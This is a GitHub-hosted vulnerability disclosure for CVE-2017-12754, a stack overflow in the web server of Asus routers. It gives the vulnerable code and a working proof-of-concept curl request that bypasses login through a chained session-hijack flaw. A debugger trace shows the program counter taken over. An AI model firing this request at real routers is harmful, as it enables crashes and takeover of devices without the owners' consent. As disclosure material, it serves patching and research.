Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Wireless-Router-Vulnerability/Asus_DeleteOfflineClientOverflow.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
163 lines (143 sloc)
7.12 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2017-12754 | |
| [Vulnerability]: | |
| Stack buffer overflow in httpd | |
| ------------------------------------------ | |
| [Exploitation]: | |
| Can control the $pc. | |
| Use together with a session hijack vulnerability or in a csrf attack, | |
| can remote code execution and then get a connectback shell. | |
| ------------------------------------------ | |
| [Vendor of Product]: | |
| Asus wireless router | |
| ------------------------------------------ | |
| [Affected Products and firmware version]: | |
| Asuswrt-Merlin ,all the firmware and the latest firmware is 380.67_0 | |
| RT-AC5300 ,all the firmware,include the last and before. | |
| RT_AC1900P ,all the firmware,include the last and before. | |
| RT-AC68U ,all the firmware,include the last and before. | |
| RT-AC68P ,all the firmware,include the last and before. | |
| RT-AC88U ,all the firmware,include the last and before. | |
| RT-AC66U ,all the firmware,include the last and before. | |
| RT-AC66U_B1 ,all the firmware,include the last and before. | |
| RT-AC58U ,all the firmware,include the last and before. | |
| RT-AC56U ,all the firmware,include the last and before. | |
| RT-AC55U ,all the firmware,include the last and before. | |
| RT-AC52U ,all the firmware,include the last and before. | |
| RT-AC51U ,all the firmware,include the last and before. | |
| RT-N18U ,all the firmware,include the last and before. | |
| RT-N66U ,all the firmware,include the last and before. | |
| RT-N56U ,all the firmware,include the last and before. | |
| RT-AC3200 ,all the firmware,include the last and before. | |
| RT-AC3100 ,all the firmware,include the last and before. | |
| RT_AC1200GU ,all the firmware,include the last and before. | |
| RT_AC1200G ,all the firmware,include the last and before. | |
| RT-AC1200 ,all the firmware,include the last and before. | |
| RT-AC53 ,all the firmware,include the last and before. | |
| RT-N12HP ,all the firmware,include the last and before. | |
| RT-N12HP_B1 ,all the firmware,include the last and before. | |
| RT-N12D1 ,all the firmware,include the last and before. | |
| RT-N12+ ,all the firmware,include the last and before. | |
| RT_N12+_PRO ,all the firmware,include the last and before. | |
| RT-N16 ,all the firmware,include the last and before. | |
| RT-N300 ,all the firmware,include the last and before. | |
| ------------------------------------------ | |
| [Attack Type]: | |
| Remote | |
| ------------------------------------------ | |
| [Can Cause Denial of Service?]: | |
| yes | |
| ------------------------------------------ | |
| [Reference]: | |
| https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289 | |
| http://asuswrt.lostrealm.ca/ | |
| https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (chose the others can download the firmware sourcecode) | |
| https://www.asus.com/Networking/Wireless-Routers-Products/ | |
| ------------------------------------------ | |
| [Discoverer]: | |
| Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/ | |
| ------------------------------------------ | |
| [Affected components]: | |
| Affected executable application: httpd | |
| Affected source code file: \release\src\router\httpd\web.c | |
| Affected function: deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query) | |
| ------------------------------------------ | |
| [Vulnerability details]: | |
| When accessing the deleteOfflineClient.cgi of the web manager(httpd),the httpd will call the function deleteOfflineClient() | |
| to parses the url which in http GET request,and it will use function websGetVar() to get the value of the parameter delete_offline_client | |
| in the url. but, when saving the delete_offline_client to the stack buffer char mac_str[13],it doesn't limit the the length of the parameter | |
| delete_offline_client,so the stack buffer mac_str[13] will be overflow and this stack-based overflow can be used to gain control over | |
| httpd's control flow by overwriting the saved $ra stored on the stack. | |
| deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query) | |
| { | |
| char *mac = NULL; | |
| char mac_str[13]; | |
| mac = websGetVar(wp, "delete_offline_client",""); | |
| ...... | |
| ...... | |
| i = 0; | |
| while(*mac) { | |
| if(*mac==':') { | |
| mac++; | |
| continue; | |
| } | |
| else { | |
| mac_str[i] = tolower(*mac); | |
| i++; | |
| mac++; | |
| } | |
| } | |
| if(i!=12) | |
| return; | |
| ...... | |
| } | |
| ------------------------------------------ | |
| [Exploitation details]: | |
| Because access to the deleteOfflineClient.cgi page requires web authentication,so it needs a session hijack vulnerability or a | |
| csrf attack to get access permissions for the deleteOfflineClient.cgi at first. And then, we can use this vulnerability to control | |
| the httpd's control flow $pc by overwriting the saved $ra stored on the stack. | |
| For example, we can send a http get request like: | |
| GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1 | |
| And the httpd's control flow $pc will be set to 0x00333333. | |
| ------------------------------------------ | |
| [POC]: | |
| # Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479) | |
| # With the help of CVE-2017-6549(Session hijack), this POC can exploit this vulnerability to control the $pc | |
| curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 | |
| ------------------------------------------ | |
| [Gdb trace]: | |
| admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd) | |
| dlopen failed on 'libthread_db.so.1' - File not found | |
| GDB will not be able to debug pthreads. | |
| GNU gdb 6.8 | |
| Copyright (C) 2008 Free Software Foundation, Inc. | |
| License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> | |
| This is free software: you are free to change and redistribute it. | |
| There is NO WARRANTY, to the extent permitted by law. Type "show copying" | |
| and "show warranty" for details. | |
| This GDB was configured as "mipsel-linux"... | |
| I'm sorry, Dave, I can't do that. Symbol format `elf32-tradlittlemips' unknown. | |
| Attaching to program: /usr/sbin/httpd, process 651 | |
| 0x2ad8d05c in ?? () from /lib/libc.so.0 | |
| (gdb) c | |
| Continuing. | |
| Program received signal SIGSEGV, Segmentation fault. | |
| 0x00333333 in ?? () | |
| (gdb) i r | |
| zero at v0 v1 a0 a1 a2 a3 | |
| R0 00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff | |
| t0 t1 t2 t3 t4 t5 t6 t7 | |
| R8 2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67 | |
| s0 s1 s2 s3 s4 s5 s6 s7 | |
| R16 61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158 | |
| t8 t9 k0 k1 gp sp s8 ra | |
| R24 00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333 | |
| status lo hi badvaddr cause pc | |
| 01009c13 11288d57 00000001 00333332 00000008 00333333 | |
| fcsr fir restart | |
| 00800000 00000000 00000000 | |
| (gdb) c | |
| Continuing. | |
| Program terminated with signal SIGSEGV, Segmentation fault. | |
| The program no longer exists. | |
| As we have seen, the registers ra and pc are overwritten by 0x00333333. | |
| Finally, with the ROP can lead to Remote Command Execution. |